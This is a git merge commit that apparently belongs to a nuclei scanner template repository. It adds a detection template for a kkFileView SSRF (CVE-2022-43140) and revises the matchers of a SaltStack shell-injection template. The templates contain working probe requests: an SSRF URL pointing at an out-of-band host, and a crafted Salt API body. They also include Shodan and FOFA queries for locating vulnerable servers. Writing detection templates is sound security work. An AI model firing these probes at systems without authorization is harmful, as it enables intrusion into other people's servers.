Merge pull request #6959 from Co5mos/CVE-2022-43140

ADD CVE-2022 -43140
2023-03-28 18:14:54 +05:30 · 2023-03-28 18:14:54 +05:30 · d583acb999
parent 197e764bc7 075698b02a
commit d583acb999
2 changed files with 48 additions and 10 deletions
--- a/cves/2020/CVE-2020-16846.yaml
+++ b/cves/2020/CVE-2020-16846.yaml
@ -4,7 +4,8 @@ info:
  name: SaltStack <=3002 - Shell Injection
  author: dwisiswant0
  severity: critical
-  description: SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client.
+  description: |
+    SaltStack Salt through 3002 allows an unauthenticated user with network access to the Salt API to use shell injections to run code on the Salt-API using the SSH client.
  reference:
    - https://saltproject.io/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
    - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
@ -24,18 +25,24 @@ requests:
    body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei"
    headers:
      Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header
+
    matchers-condition: and
    matchers:
+      - type: word
+        part: body
+        words:
+          - "An unexpected error occurred"
+
+      - type: dsl
+        dsl:
+          - regex("CherryPy\/([0-9.]+)", header) || regex("CherryPy ([0-9.]+)", body)
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
      - type: status
        status:
          - 500
-      - type: word
-        words:
-          - "application/json"
-        part: header
-      - type: word
-        words:
-          - "An unexpected error occurred"
-        part: body
-
 # Enhanced by mp on 2022/04/27
--- a/cves/2022/CVE-2022-43140.yaml
+++ b/cves/2022/CVE-2022-43140.yaml
@ -0,0 +1,31 @@
+id: CVE-2022-43140
+
+info:
+  name: kkFileview v4.1.0 - Server Side Request Forgery
+  author: Co5mos
+  severity: high
+  description: |
+     kkFileView v4.1.0 was discovered to contain a Server-Side Request Forgery (SSRF) via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. This vulnerability allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the url parameter.
+  reference:
+    - https://github.com/kekingcn/kkFileView/issues/392
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-43140
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-43140
+  metadata:
+    verified: "true"
+    shodan-query: http.html:"kkFileView"
+    fofa-query: app="kkFileView"
+  tags: cve,cve2022,ssrf,kkFileview
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}"
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<h1> Interactsh Server </h1>"